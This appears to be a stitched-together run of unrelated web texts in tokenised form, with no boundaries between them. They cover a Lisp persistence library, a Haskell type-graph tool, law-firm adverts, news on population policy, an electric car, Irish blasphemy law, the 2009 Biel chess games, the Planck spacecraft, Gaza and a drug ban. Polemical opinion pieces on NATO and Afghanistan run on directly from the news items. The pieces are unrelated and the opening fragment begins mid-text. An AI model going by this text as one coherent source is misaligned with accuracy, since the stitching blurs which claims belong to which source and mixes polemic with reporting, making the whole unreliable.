cl- perec : defpclass * is a thin wrapper around defclass - star which sets the metaclass to cl- perec : persistent - class .
defclass - star tries to provide sensible accessor name defaults ( slot - name - of ) , among other things .
If you have multiple databases , or perhaps just multiple database connections , have a look at with - transaction * : ( cl - perec : with - transaction * ( : database * test - db* ) & body ) )
Of course , you could also just bind cl - perec : * database * yourself .
Continue to Persisting Simple Types with cl-perec
[ Haskell - cafe ] ANNOUNCE : graphtype — A simple tool to illustrate dependencies between Haskell types
While developing applications which deal with complex data it is crucial to know how exactly you manipulate this data .
Haskell provides excellent tools for expressing a data scheme you work with : ADTs , `type` and `newtype` declarations , type classes and much more is hidden in rich Haskell 's type system .
Obviously , when types of data in your domain you work with grow — all declarations grow , and it becomes hard to grasp all dependencies , to change them and to remove them deliberately .
graphtype was developed to visualise type declarations in you Haskell source files .
It produces . dot - file for subsequent processing with graphviz .
Results for example file bundled with graphtype : http://i.piccy.info/i4/00/90/bfa07290012c2d3b455696bdaa86.png
To play with it , you can use hackage : http://hackage.haskell.org/package/graphtype or hack some code : http://github.com/explicitcall/graphtype
Visualisation of dependencies in complex type class hierarchies is still on the way .
It is n't obvious how do to this nicely , as in most cases type class declarations are imported from other libraries , and you do n't always have source files for them .
Anyway , graphtype is fairly usable .
Leave here your questions , suggestions and have fun looking at type dependencies in your code .
WBR , Max
A Reliable Resource , A Trusted Advocate
There are a lot of lawyers out there who can help you get a quick divorce in Florida online , go through the bankruptcy process , defend a criminal charge or even draft a construction contract .
Unfortunately , there are a lot fewer who will make the extra effort it takes to achieve solutions that leave you in a better position moving forward .
Legal Solutions for a Better Tomorrow
At our firm , we “ go the extra mile ” for our clients in southeastern Virginia every day .
Who are our clients ?
They are individuals , families , business owners and businesses faced with problems involving various legal issues — divorce , family law , bankruptcy , criminal law , business transactions and intellectual property issues .
British couples should consider having no more than two children to help reduce the environmental impact of the rising global population , doctors have said .
An editorial in the British Medical Journal today calls on GPs to encourage the view that bigger families are as environmentally dubious as owning a patio heater or driving a gas - guzzler .
Writing in the journal , John Guillebaud , professor of family planning at University College , London and Pip Hayes , a GP based in Exeter , urge doctors to " break a deafening silence " over the use of family planning to curb the rise in population , which has been viewed by many in the community as a taboo subject .
Managing the impact of a soaring human population will be one of the most politically fraught issues governments will have to grapple with in coming decades .
Although the rate of population growth has slowed since the 80s , the UN estimates the world 's population has increased by about 76 million a year this century , which drives up greenhouse gas emissions and exacerbates the destruction of wildlife habitats .
Previous efforts to limit population growth in India in the 70s and in China , with its one child policy , have made any attempt to raise the issue in Britain highly controversial .
The authors call on schools and GPs to develop education programmes to explain how a rising population is environmentally unsustainable , and how families who have no more than two children will help ensure the population remains steady or even falls .
Government figures for 2007 show that average fertility rates in England and Wales were 1.91 , meaning there were 191 children born for every 100 women , but that rate has been rising since 2001 .
Guillebaud argues that bringing the fertility rate down to 1.7 would lead to a halving of the population within six generations .
" Should we now explain to UK couples who plan a family that stopping at two children , or at least having one less than first intended , is the simplest and biggest contribution anyone can make to leaving a habitable planet for our grandchildren ? " the editorial asks .
" We must not put pressure on people , but by providing information on the population and the environment , and appropriate contraception for everyone ... doctors should help to bring family size into the arena of environmental ethics , analogous to avoiding patio heaters and high - carbon cars . "
The authors emphasise that couples should never be coerced into having fewer children than they wish , but the environment should become part of a couple 's decision making .
The doctors , both of whom are linked to the Optimum Population Trust , a thinktank that researches the impacts of a rising population , claim that every new birth in the UK produces 160 times more greenhouse gas emissions than one in Ethiopia .
" We are not criticising those people in Britain who had large families in the past , because a lot of people had no inkling about the sustainability implications , " Guillebaud told the Guardian .
" The decision that needs to be made is one that balances rights .
It 's people 's right to have the size of family they choose , but surely that should be balanced against the rights of future generations . "
But the debate is complex , as a sharply falling population would have considerable economic , fiscal and social impact .
The editorial calls for improved availability of contraceptives in the developing world , where the biggest rises in population are anticipated .
The authors cite the impact of widely available contraception in countries such as Costa Rica and Iran , which have cut their fertility rates .
Chris West , director of the Environmental Change Institute at Oxford University , said that while there were good environmental reasons for halting the rise in human population , it would not deliver sufficient cuts in greenhouse emissions quickly enough .
" If we had a way to reduce the population ... it would be one way to address climate change , but in the current circumstances , it 's not a very effective way , " he said .
" For all sorts of other reasons ... we probably need to be aiming at zero population growth , but it 's not going to deliver emission reductions on anything like the timescale we need . "
Backstory
Humans have struggled with overpopulation since antiquity , when the Greeks were forced to set up colonies across the Mediterranean to reduce pressure on resources back home .
According to some accounts , they also encouraged sexual abstinence , delayed fatherhood and introduced basic forms of abortion .
In modern times , India began to control its population growth in the 50s in an attempt to alleviate poverty , but stepped up efforts in the 70s , with education programmes and state - sponsored birth control .
In China it is estimated that the one - child policy brought in during the late 70s has prevented nearly half a billion births .
In many countries , simply providing contraception has been enough to bring fertility rates below the figure needed to maintain a stable population , as people choose to have fewer children .
In his 1729 satirical pamphlet , A Modest Proposal , Jonathan Swift suggested that Irish families might alleviate their poverty by choosing to sell their children to the rich for food .
But nothing has been as effective in reducing the human population as the flu virus .
The 1918 strain is believed to have killed more than 20 million people .
Add one more to the growing list of small private electric - car companies : Coda Automotive , a new brand started by Miles EV , a company that ’s been selling low - speed electric vehicles from China for about four years .
The Coda sedan was unveiled last week in Santa Monica , Calif .
It is based on the Saibao , a gas - powered car built by the Hafei Automobile Group , a state - owned company in China .
The chassis was originally developed by Mitsubishi ( which licenses it to Hafei ) .
According to Coda , Hafei sells 200,000 cars a year and has delivered more than a million units since it was established in 2006 .
Coda addressed Chinese quality questions by giving the Saibao a big makeover .
The electric version had a front and rear redesign by Porsche , a partner , as well as considerable re-engineering to accommodate the battery drive and meet United States safety standards .
“ We think we have the right combination of existing automotive know - how and a mass - manufacturing partner , ” said Kevin Czinger , Coda ’s chief executive .
Other suppliers include Delphi and EnergyCS .
Mr. Czinger said the core of the Coda is an lithium - ion battery system developed in a joint venture with the Tianjin Lishen Battery Joint - Stock Company , a supplier to Apple , Motorola and Samsung .
Mr. Czinger said that the Coda ’s 700 - pound , 33.8 - kilowatt - hour battery pack is purpose - built for auto applications , with 728 cells ( compared with more than 6,000 in the Tesla Roadster ) in modules of seven .
The battery joint venture will be 40 percent owned by Coda and 60 percent by Lishen .
Coda said the new sedan would have a cruising range of 90 to 120 miles and a recharging time of less than six hours from 220 - volt service .
Zero to 60 will take less than 11 seconds and top speed is electronically limited to 80 miles an hour .
The purchase price will be $ 45,000 , and buyers could receive a $ 7,500 federal tax credit and state incentives .
On Monday , Coda said it was applying for an undisclosed amount of Department of Energy stimulus funds to build a battery plant in Enfield , Conn. , as part of a joint venture with Connecticut - based Yardney Technical Products , which makes aerospace batteries .
According to William Yalen , a program manager , Yardney has conducted research on automotive applications , but has not built auto batteries .
He said the Enfield factory was scheduled to be operating next year .
Coda may be a small company , but it has big ambitions .
The sedan will be introduced next year in a dealer - free , California - only marketing strategy that will depend on the Internet to get the word out .
Test rides will be available .
The company said it will have the capacity to build 2,700 cars in 2010 ( starting in June ) and 20,000 a year starting in 2011 .
That , of course , would be quite an ambitious number for an electric start - up .
The creators of the Father Ted television series have denounced Ireland 's proposed blasphemy laws as " insanity " and pledged to support a campaign to repeal them .
Arthur Mathews and Graham Linehan backed moves by a group of Irish secularists to challenge the bill against blasphemy introduced in the Dáil last week .
Atheist Ireland said this weekend that it will publish a statement blaspheming all the major religions in Ireland , including Christianity and Islam .
The group said it would be a calculated challenge to the law .
Under the Irish constitution , the state is obliged to have blasphemy laws .
The bill going through the Dáil would amend the Defamation Act of 1961 , which includes blasphemy as a crime .
To abolish blasphemy laws , the government would have to hold a referendum to amend the constitution .
The duo , who wrote a host of other TV comedies such as Big Train , described the blasphemy law contained in the new bill covering defamation in Ireland as " a return to the Middle Ages " .
Linehan told the Observer that the justice minister Dermot Ahern , who introduced the bill , should be challenged to define what he meant by blasphemy .
" This is insanity .
Please , Mr Ahern , define the things we can't say , please !
Can we say , ' Jesus is gay ' ?
Or can we ask , ' Is God in a biscuit ? '
Could he tell us what it means ?
It is just insanity .
After all , there are things contained in the holy books of one religion that are blasphemy to another religion .
The logic behind this comes from Alice in Wonderland . "
He said the Irish blasphemy law was part of a trend in the west where freedom of expression was being attacked " to placate the craziest people on earth " .
Linehan said that technically , under the new bill , certain scenes from Father Ted could be deemed blasphemous .
" In Ted we kind of generally avoided central tenets of belief , because it was not what the show was about .
It was about a very bad priest who did n't think about religion a lot .
Writers should not be looking over their shoulders .
If you are writing a satire today , the Irish government are making it harder to do that . "
Mathews said the bill " hardly seems necessary in the Ireland of the 21st century ...
It 's a pity that law had n't been introduced when we were writing Father Ted , because it would have given us a great storyline .
The best attitude to this nonsense is to laugh at it and send it up .
There is no popular clamour for it in Ireland , so I wonder why Dermot Ahern has brought it in the first place . "
Michael Nugent , of Atheist Ireland , who has also written comedy with Mathews , said the bill was silly and dangerous .
" It is silly because it revives a medieval religious law in a modern pluralist republic , and it makes Ireland seem like a backward country .
People need protection .
Ideas do not .
Ideas should always be open to criticism and ridicule .
If the law is passed , we will be immediately testing it by publishing a blasphemous statement . "
Nugent pointed out that in 1909 George Bernard Shaw had a play banned for blasphemy .
" He defended himself by saying he deliberately wrote immoral and heretical plays in order to challenge the public to reconsider its morals .
Exactly 100 years later , we will be doing the same thing : deliberately publishing a blasphemous statement , in order to challenge the government to reconsider this absurd law . "
Mathews said he supported Nugent 's stance on publishing blasphemy and predicted a Life of Brian - style fate for his old friend .
" Ideally I 'd like to see Mick stoned to death for the crime of blasphemy .
It would be tough to see him go , but I would be turning up to the stoning just for the sheer fun of it , " he said .
Mathews may be about to get into trouble himself - not over blasphemy but his new take on the Irish famine .
His latest film , to be released in August , stars Fr Dougal , aka Ardal O'Hanlon , from Father Ted , and is set in a famine theme park in the Republic that includes a cafe for tourists .
O'Hanlon , playing a drifter who gets a job in the theme park , has to dress up as a starving Irish peasant from the 1840s .
Atheist Ireland meanwhile said it would finalise plans for a blasphemous statement at its annual meeting , which is open to the public , in Wynns Hotel in Dublin next Saturday .
Under the new law , anyone found guilty of blasphemy in the wider Defamation Act can be fined up to € 25,000 ( £ 21,400 ) .
Tens of thousands of Georgian protesters attend a rally near the parliament building in Tbilisi in early April
President Obama and Secretary of State Clinton have announced that they intend to keep the promise of former president George W. Bush to send $ 242 million in military aid to Georgia in the 2010 budget .
This comes at the very time that NATO war games are being prepared in Georgia , right on Russia 's southern border .
Russia 's President Dmitry Medvedev sounded the alarm about the NATO military operations saying , " “ Military exercises ca n’t be conducted where the war has been recently unleashed .
Those who took a decision to conduct them will bear responsibility for their negative consequences .
" Russia vows to help South Ossetia and Abkhazia protect their borders against a new Georgian attack that could well come following the NATO war games and efforts by the US to rearm Georgia after their failed attack on Russia last summer .
NATO is accusing Russia of destabilizing the Southern Caucasus region by building up its military stronghold on the Georgian breakaway regions of South Ossetia and Abkhazia .
The absurdity of NATO blaming Russia for securing their southern border , at the very time the US and NATO are surrounding them , indicates the real agenda underway .
Some countries in the region are refusing to participate in the NATO - Georgia war games , recognizing the dangers they are causing in the region .
So far Latvia , Estonia , Kazakhstan , Armenia , Serbia and Moldova have opted out .
Just last month more than 60,000 Georgians marched onto their capital in Tbilisi calling on their fanatical President Mikheil Saakashvili to resign .
The protesters said he is ruining their country and that they want peace with Russia .
But Saakashvili , educated in the US , is an agent of corporate globalization and his job is to turn Georgia over to US interests which he has done .
He has essentially made his country into a US military base on the Russian border .
Although NATO leaders call the upcoming war games " staff training " , they are nevertheless aimed at backing the puppet regime of Saakashvili .
I 'm following this Georgia - Russia situation closely as I see it as one key trigger for real war between the US - NATO and Russia .
Just today I read that Czech Republic pilots are being sent on missions along the Russian border in a separate NATO operation .
This is the first time that the Czech military 's tactical air force has been deployed in a foreign operation since the end of World War II .
Another area of major US - NATO moves against Russia is over control of the Artic region .
Due to global warming the extraction of oil will now be possible in the Artic and the US is saying that its growing effort to militarize this region is about " security " .
In a meeting in Reykjavik in January NATO General Secretary Jaap de Hoop Scheffer said that “ Here in the High North , climate change is not a fanciful idea – it is already a reality – a reality that brings with it a certain number of challenges , including for NATO .
" The challenges the NATO General Secretary refers to is keeping Russia at bay .
Take a look at a map of the Artic north and you will see it is Russia that has the biggest land mass in that region .
The US and NATO are out to rule the world - they have become the military arm of corporate globalization .
Obama and Hillary are doing their part to make it happen .
The 42nd Biel International Chess Festival is taking place from July 18th to 31st 2009 .
There are ten different tournaments ( open , rapid , blitz , youth , Chess 960 ) .
The main event is a Category 19 double round robin tournament with six players averaging 2716 Elo points and 28.3 years of age .
Round seven
Two decisive games , one hard - fought draw was what the players provided in the seventh round of the event .
Vassily Ivanchuk pressed against Evgeny Alekseev but could not overcome the resilient and imaginative defence of his Russian opponent .
Boris Gelfand 's losse was the result of a blunder – after his traumatic loss to Aleckseev in the previous round this time Morozevich had a bit of luck .
Boris Gelfand suffering against Alexander Morozevich ( standing )
Gelfand , B ( 2755 ) - Morozevich , A ( 2751 ) [ E04 ]
GM Biel SUI ( 7 ) , 27.07.2009
1.d4 Nf6 2.c4 e6 3.Nf3 d5 4.g3 dxc4 5.Bg2 a6 6.Ne5 Bb4 + 7.Nc3 Nd5 8.0-0 0-0 9.Qc2 b5 10 . Be4 Bb7 11.Nxd5 Bxd5 12 .
Bxh7 + Kh8 13 .
Be4 Qe8 14.Bg2 Bxg2 15 .Kxg2 Nd7 16.Nf3 e5 17.b3 exd4 18 . Nxd4 Qe5 19.Nf3 Qc3 20 .Qb1 Qf6 21.Rd1 Ne5 22.Rd5 Ng6 23.a3 Bc3 24.Ra2 Qc6 25 .
Rh5 + Kg8 26.Rc2 Bf6 27.bxc4 bxc4 28.Bg5 Rab8 29.Qc1 Rb5 30 .
Rxc4 Qe6 31.a4 Rd5 32.e4 Ra5 33.e5 ?
( the threat was 33 ... Nf4 + , but Fritz tells us that 33.h3 was the right repudiation ) 33 ... Bxe5
34.Bd2 ? Bb2 !
A discovered attack on the Rh5. 35 .
Rxa5 .
Gelfand give his queen rather than embark on 35 .
Qxb2 Rxh5 36 .Qd4 –+. 35 ... Bxc1 36 .Rxc1 Qe4 37 .Be3 ? ( things are going from bad to worse ) 37 ... Nh4 + 38.gxh4 Qg4 + 39.Kf1 Qxf3 40 .
Rac5 Re8 41.Kg1 Re4 42.Rg5 Rxh4 43.Rg3 Qh5 44 .
Rxc7 Rxh2 45 . Bd4 Rh1 + 46.Kg2 Qh2 + 47.Kf3 Rg1 48.Rxg1 Qxg1 0 - 1 .
Everybody and their mother - in - laws seem to be playing the Berlin Defence of the Ruy Lopez these day , but their opponents are well equipped with attacking mechanisms and the success rate against this annoying line is improving .
The 18 - year - old French Super - GM , who has drawn his first six games , takes his 16 - year - old Italian opponent to the cleaners .
18 - year - old French GM Maxime Vachier - Lagrave defeated ...
... the youngest player in the tournament : Fabiano Caruana , 16
Vachier Lagrave , M ( 2703 ) - Caruana , F ( 2670 ) [ C67 ]
GM Biel SUI ( 7 ) , 27.07.2009
1.e4 e5 2.Nf3 Nc6 3 .Bb5 Nf6 4.0-0 Nxe4 5.d4 Nd6 6 . Bxc6 dxc6 7.dxe5 Nf5 8.Qxd8 + Kxd8 9.Nc3 Ke8 10.h3 h5 11 .Bf4 Be7 12 . Rad1 Nh4 13 .Nd4 Nf5 14 . Nce2 g5 15 .Bh2 a6 16.e6 Nd6 17 .Rfe1 Rh6 18.exf7 + Kxf7 19.Nf3 g4 20 . Ne5 + Kg7 21.Bf4 Rh7 22.hxg4 hxg4 23.Ng3 Bf6 24 .Nd3 Nf5 25 . Ne4 Be7 26 .
Bxc7 Be6 27.Nf4 Bf7 28.Rd7 Re8 29 .Ng5 Rh6 30 .
Be5 + Kg8 31 . Nxf7 Kxf7 32.Bc3 g3 33.Re5 gxf2 + 34 . Kxf2 Nd6 35 .Bb4 Nc8 36 .
Rxb7 Rh4 37 .
Bxe7 Rxf4 + 38.Ke3 1-0 .
Round eight
One game in round eight was the kind nobody wishes to see in these events :
Alekseev , Evgeny ( 2714 ) - Gelfand , B ( 2755 ) [ C42 ]
GM Biel SUI ( 8 ) , 28.07.2009
1.e4 e5 2.Nf3 Nf6 3 . Nxe5 d6 4.Nf3 Nxe4 5.d4 d5 6.Bd3 Nc6 7.0-0 Be7 8 .Nbd2 Nxd2 9.Bxd2 Bg4 10.c3 0-0 11.h3 ½-½.
However the other two games compensated for this I - do n't - feel - like - playing draw .
Ivanchuk played the Pirc – is there anything this man does not have in his repertoire ?
– equalised effortlessly and went on the attack .
Vassily Ivanchuk at the start of round eight
Caruana , F ( 2670 ) - Ivanchuk , V ( 2703 ) [ B07 ]
GM Biel SUI ( 8 ) , 28.07.2009
1.d4 d6 2.e4 Nf6 3.Nc3 g6 4.Be3 Bg7 5 .Qd2 c6 6 .Bh6 Bxh6 7 . Qxh6 Qa5 8.Bd3 c5 9.Nge2 Nc6 10.d5 Ne5 11.Bb5 + Kd8 12.Ng3 c4 13.h3 ( 13.g5 is a promising alternative ) 13 ...a6 14.f4 Nf3 + 15.gxf3 axb5 16.0-0 b4 17.Nce2 Qc5 + 18.Kg2 Bd7 19.c3 bxc3 20 .Nxc3 b5 21.a3 Kc7 22.Rad1 Rhg8 23.e5 Nh5 24 . Rfe1 g5 25.exd6 + exd6
White is doing fine and after 26.fxg5 Nf4 + 27.Kh1
Black has no dangerous attack .
26 . Nxh5 ? Rg6 27 . Ne4 Rxh6 28.Nxc5 dxc5 29 .Ng3 gxf4 30 . Ne2 .
Now Black is clearly better .
30 ... Kd6 ( 30 ... Bxh3 + is an obvious alternative ) 31 .
Nxf4 Rg8 + 32.Kf2 Rh4 33 .Ng2 Rxh3 34.Rh1 Rgg3 35 .
Rxh3 Rxh3 36.Re1 h5 37.Re4 Rh1 38.a4 Rb1 39.axb5 Rxb2 + 40.Kg3 c3 41.Ne3 Bxb5 0 - 1 .
Alexander Morozevich and Fabiano Caruana , who both lost their games in round eight
An even more exciting and tragic game was the following encounter , which show Caissa from her worst side : one day she frowns on Morozevich , next day she smile , and then she frowns again .
Talk about fickle ...
Morozevich , A ( 2751 ) - Vachier Lagrave , M ( 2703 ) [ B90 ]
GM Biel SUI ( 8 ) , 28.07.2009
1.e4 c5 2.Nf3 d6 3.d4 cxd4 4.Nxd4 Nf6 5.Nc3 a6 6.f3 e6 7.Be3 b5 8.Qd2 Nbd7 9.g4 h6 10.0-0-0 b4 11.Nce2 Qc7 12.h4 d5 13.Nf4 e5 14 . Nfe6 fxe6 15 . Nxe6 Qa5 16.exd5 Qxa2 17.Qd3 Kf7 18.g5 Nxd5 19 . Bh3 Nxe3 20 . Nd8 + Ke7 21.Nc6 + Kf7
Addendum : Franz Mauelshagen of Germany followed the game on the Playchess server and analyed the following very exciting lines : 22 .Be6 +!!
Kxe6 23 .Qg6 + Nf6 24 .Nd8 + leads to mate : 24 ... Ke7 25.gxf6 + gxf6 26.Nc6 + Ke6 27 .Qe8 + Kf5 28 .Nd4 +! Kf4 ( 28...exd4 29.Qe4# ) 29 . Ne2+ Kf5 30 . Ng3 + Kf4 31 . Nh5 + Kxf3 32 .Qc6 + Nd5 33 .
Rxd5 Qa1 + 34.Kd2 Qxh1 35 .
Rxe5 + Kg4 36 .Qc4 + Kh3 37 .Qd3 + and mate in three more moves .
Black 's only defence after 22 .
Be6 +!! is 22 ... Qxe6 23 . Nd8 + Ke7 24 . Nxe6 Kxe6 ( 24 ... Nxd1 25 .Rxd1 Kxe6 26 .Qd5 + Ke7 27 . Qxa8+–) 25 . Qxe3 with a clear win for White .
[ Click to replay this analysis ]
22.g6 + Kg8 23 . Qxe3 Bc5 24 .Qe4 Nf8 25 .Rd8 Bb7
Switch on your engines , ladies and gentlemen .
After innovative play in an English Attack Alexander Morozevich can finish his French opponent off and take the brilliancy prize : 26 .
Rxf8 + Bxf8 ( or 26 ... Rxf8 ) 27 . Qxe5 threatening 28 .Be6 and mate .
Fritz says
White can force mate in at the most 19 more moves .
But not after 26 .
Rxa8 ?
Bxa8 27.h5 Rh7 ( what a move , what an amazing game ) 28.
Re1 Bxc6 29 .Qxc6 Bd4 30 .Kd2 Qxb2 31.Qc4 + Kh8 32.Kd3 a5 33.Qc8
Just imagine sitting across from Morozevich with this position on the board .
But Maxime VL has a defence ready and is cool as a cucumber : 33 ... Qa3 + 34 .Ke4 b3 35.cxb3 a4 ! 36.Rb1 Qb4 37.Qc4 Qb7 + 38 .Qd5 Qb4 39 .Qc4 Qd2
The last move before the time control is a costly mistake by Morozevich .
Instead of finally playing 40.gxh7 ( or 40 . Qc8 ) he goes for 40 .
Bg4 ? , allowing 40 ...a3 41.Qf7 Qc2 + 42.Kd5 Qc5 + 43.Ke4 a2 44.Rc1 a1Q ( three ladies on the board ) 45 .
Rxc5 Bxc5 46 .Qd5 Qe1 + 47.Kd3 Qd1 + 48.Kc4 Qxd5 + 49 .Kxd5 Ba3 50 .Bf5 Kg8 51 . Kxe5 Rh8 .
Can you believe it ?
Black has managed to extricate his rook , which has been trapped and hanging on h7 for 23 moves .
52.Kd5 Nh7 53.gxh7 + Kf7 54 .Bg6 + Kf6 55.f4 Bc1 56.f5 Bd2 57.Kd6 Be1 58.Kd7 Bb4 59.Kc7 Ke5 60 .Kd7 Ba3 61.Kc6 Kd4 62.Kc7 Kc3 63.Kd7 Kb4 64.Kd6 Kxb3 + 65.Kd5 Bb2 66 .Kd6 Bf6 67.Kc5 Kc3 68.Kd6 Kd4 69.Kc6 Rd8 70 .Kb6 Kd5 71.Kc7 Kc5 72.Bf7 g5 73.fxg6 Rd6 74.Be8 Be5 75 .Kb7 Rb6 + 76.Kc8 Kd6 with an impending mate .
0 - 1 . It is well worth replaying this game with a good chess engine running .
Alexander Morozevich has a capricious affair with Caissa
Pictures by Pascal Simon , ChessBase
Current standings
PC World 's store shelves will only feature netbooks with Microsoft 's Windows operating system , the retailer has said , and will stop selling Linux - based machines in store .
Jeremy Fennell , category director at PC World , said most buyers do n't opt for the cheapest netbook , instead buying around the 300 range .
He said customers looked for a " software system they were familiar with " despite hopes from many the cheap and cheerful devices would go open source .
" Despite initial hype that netbooks would move more users onto the Linux platform , Microsoft has emerged as the preferred operating system because Windows makes it easier to share content , and provides customers with a simpler , more familiar computing experience on the move , " he claimed in a statement .
" Based on this insight , all the netbooks in our stores will feature Microsoft Windows , larger screens and keyboards , and greater colour choices to satisfy customers demand for performance , design and familiarity , " he added .
PC World said Linux - based netbooks will still be available online , however .
Microsoft was obviously ecstatic about the news , with Windows communications manager Brandon LeBlanc saying on the Microsoft blog that " it 's important to note that all of this momentum is happening before Windows 7 is even out . "
So , more British soldiers have now been killed in Afghanistan than in Iraq .
Why are British troops in Afghanistan ?
We know why American forces are in Afghanistan–to fight the Taliban terrorists “ over there ” so we do n’t have to fight them “ over here , ” Â to find Osama bin Laden , to avenge the 9/11 attacks , and to defend our freedoms , or at least these are thingsÂ that Â many Americans think .
But why are British troops in Afghanistan ?
Britain had no 9/11 .
But Britain is our ally .
Well , Israel is our ally .
Japan is our ally .
Germany is our ally ( in this war ) .
How many soldiers from Israel , Japan , and Germany are in Afghanistan ?
I wonder how many Americans would support U.S. troops in Afghanistan if things were just the opposite and it was Britain that was waging a war on terror because of a 9/11 attack ?
If I lived in Britain , I would be even more outraged than I am as an American because of American troops in Afghanistan .
Author : Laurence Vance Laurence
Vance holds degrees in history , theology , accounting , and economics .
He has written and published twelve books and regularly contributes articles and book reviews to both secular and religious periodicals .
View all posts by Laurence Vance
Helping Consumers and Business Owners Get Debt Relief
If you are faced with debts you cannot afford to pay , and especially if you are being threatened with serious consequences like foreclosure or wage garnishment , you owe it to yourself to learn more about your bankruptcy options .
We can help .
Debt is a fact of life in the modern economy , where achieving your goals often requires investment from outside sources .
Unfortunately , sometimes unexpected circumstances can lead to debt getting out of control .
Loss of a job , a medical emergency , a divorce , or another situation can make debt unmanageable .
When that happens , you have certain rights under federal law to seek cancellation or reorganization of your debts .
That procedure is called bankruptcy , and at John T. Turco & Associates , our attorneys are devoted to helping people understand their rights and file for bankruptcy if they choose to do so .
If you are interested in learning more about your bankruptcy options , contact us to schedule a free , no -commitment consultation that can be held at our offices in Omaha or by telephone .
Enabling & Support Coolest spacecraft ever in orbit around L2 03/07/2009 3421 views 2 likes
Last night , the detectors of Planck 's High Frequency Instrument reached their amazingly low operational temperature of - 273.05 °C , making them the coldest known objects in space .
The spacecraft has also just entered its final orbit around the second Lagrange point of the Sun - Earth system , L2 .
Planck is equipped with a passive cooling system that brings its temperature down to about - 230 °C by radiating heat into space .
Three active coolers take over from there , and bring the temperature down further to an amazing low of - 273.05 °C , only 0.1 °C above absolute zero - the coldest temperature theoretically possible in our Universe .
Such low temperatures are necessary for Planck ’s detectors to study the Cosmic Microwave Background ( CMB ) , the first light released by the universe only 380 000 yrs after the Big Bang , by measuring its temperature across the sky .
Like measuring the heat of a rabbit on the Moon Planck telescope focal plane unit
The detectors will look for variations in the temperature of the CMB that are about a million times smaller than one degree – this is comparable to measuring from Earth the heat produced by a rabbit sitting on the Moon .
This is why the detectors must be cooled to temperatures close to absolute zero ( –273.15 °C , or zero Kelvin , 0K ) .
Details on the different stages of the cool - down process are available via the ' Planck in depth ' link at right .
Arriving at L2 Starting at 13:15 CEST yesterday , the Planck Mission Control Team conducted a crucial orbit insertion manoeuvre designed to place the satellite into its final orbit about L2 .
Planck 's orbit
Once commanded , the burn was auto - controlled by Planck , with the thrusters operating for between 12 and 24 hours .
The manoeuvre directed the satellite into its final operational orbit around the second Lagrange point of the Sun- Earth system , L2 .
The thruster burn was planned to deliberately underperform by a small margin , necessitating a small ' touch up ' manoeuvre in the coming days to bring the satellite fully onto its planned trajectory .
" While this manoeuvre itself is routine , it represents the final major step in the long voyage to L2 , and everyone here is quite happy to see Planck getting into its operational orbit , " said Chris Watson , Spacecraft Operations Manager , speaking in the mission 's Dedicated Control Room at ESA ’s European Space Operations Centre , Darmstadt , Germany .
Combined focal plane of Planck 's two instruments
The manoeuvre was planned to change the satellite ’s speed by 211.6 km / hour , ending with a final speed of 1010 Km / hour with respect to the ground .
Together with Earth and the virtual point L2 , Planck will then be orbiting the Sun at a speed of 106 254 km / hour ( 29.5 km/ second ) .
At the start of yesterday ’s manoeuvre , Planck was located 1.43 million km from Earth .
Science operations to begin soon
All commissioning activities are on schedule , and this phase of the mission is practically complete .
Over the next few weeks , the operation of the instruments will be fine - tuned for best performance .
Planck will begin to survey the sky in mid-August .
Notes for editors :
The three cooling stages were built by different institutes , part of the two instrument consortia which manufactured and delivered Planck ’s Low and High Frequency Instruments :
The 20 K cooler : The Jet Propulsion Laboratory , California , USA
The 4 K cooler : The Rutherford Appleton Laboratory ( a member of the HFI consortium ) , Didcot , UK and Astrium , UK
The 0.1 K cooler : Institut Néel , Grenoble , France and Institut d’Astrophysique Spatiale , Orsay , France ( both members of the HFI Consortium ) , and DTA Air Liquide , Grenoble , France
Please turn on JavaScript .
Media requires JavaScript to play .
Advertisement The International Committee of the Red Cross has described the 1.5 million Palestinians living in Gaza as people " trapped in despair " .
In a report , it said that a main cause was the continuing Israeli blockade .
The report comes six months after the end of Israel 's military offensive in Gaza in which at least 1,100 Palestinians died .
Israel said the offensive was aimed at curbing rocket attacks into southern Israel by Palestinian militants .
The Red Cross says that the people of Gaza are unable to rebuild their lives and are sliding ever deeper into despair .
There is not the cement or steel to reconstruct neighbourhoods hit by Israeli strikes .
RED CROSS REPORT
Residents lack adequate shelter after homes destroyed Building materials , pipes and spare parts urgently needed Basic medicines , reliable hospital equipment are in short supply Collapse of Gaza 's economy has caused poverty to soar
Guide : Gaza under blockade Gaza industries struggle to rebuild Recovery battle for Gaza war injured Seriously ill patients are not receiving the treatment they need .
The water supply is patchy , sanitation on the point of collapse .
The ICRC statement comes as a UN Human Rights Council inquiry into alleged war crimes in Gaza and southern Israel holds public hearings in Gaza City .
South African judge Richard Goldstone 's inquiry is holding two days of hearings in Gaza and will take testimony in Geneva in July .
Israel has refused to allow the investigators onto its territory and has accused the mission of bias against it .
Worst affected Poverty in Gaza is at what the Red Cross calls an " alarming " level .
" The poorest residents in particular have exhausted their coping mechanisms and often have to sell off their belongings to be able to buy enough to eat , " said Antoine Grand , head of the ICRC 's sub-delegation in Gaza .
FROM BBC WORLD SERVICE
Please turn on JavaScript .
Media requires JavaScript to play .
More from BBC World Service " Worst affected are the children , who make up more than half of Gaza 's population , " he added .
The Red Cross says the crisis is directly linked to Israel 's tight closure of the crossing points into Gaza after the Islamist Hamas movement took power there two years ago .
The Israeli prime minister 's spokesman told the BBC that Hamas is primarily responsible for the hardship of Gaza 's civilian population .
And he said the idea that , should building materials be allowed in , Hamas would not siphon them off for what he called its military machine was simply not credible .
Donors have pledged $ 4.5 billion for reconstruction and rehabilitation in Gaza following the 22 - day offensive .
According to the United Nations , the military campaign left more than 50,000 homes , 800 industrial properties and 200 schools damaged or destroyed , as well as 39 mosques and two churches .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
The government 's drug experts will tomorrow recommend banning Spice , a herbal smoking mixture thought to be as strong as some strains of skunk cannabis .
The decision , which the home secretary , Alan Johnson , is expected to endorse , will mark the first official move to curb a burgeoning market in " legal highs " .
Sales of herbal drug subsitutes have grown rapidly through a network of online sites and backstreet " head shops " .
The government 's Advisory Council on the Misuse of Drugs ( ACMD ) is to warn that Spice Gold , which is advertised as a herbal high and an " aromatic potpourri " , is in reality far from innocuous .
They will say it contains synthetic chemicals that mimic the effects of some of the more powerful active ingredients in cannabis .
The council 's advice follows a request from the former home secretary Jacqui Smith to investigate the product in March .
She voiced her concern over the " wide and largely unregulated market in the sale of psychoactive legal alternatives to illegal drugs , particularly as they are actively marketed to young people in head shops and via websites .
" Advice on the availability and harms of these so called ' legal highs ' , with a particular focus on protecting young people , will be very useful in informing future government policies , " Smith told the ACMD .
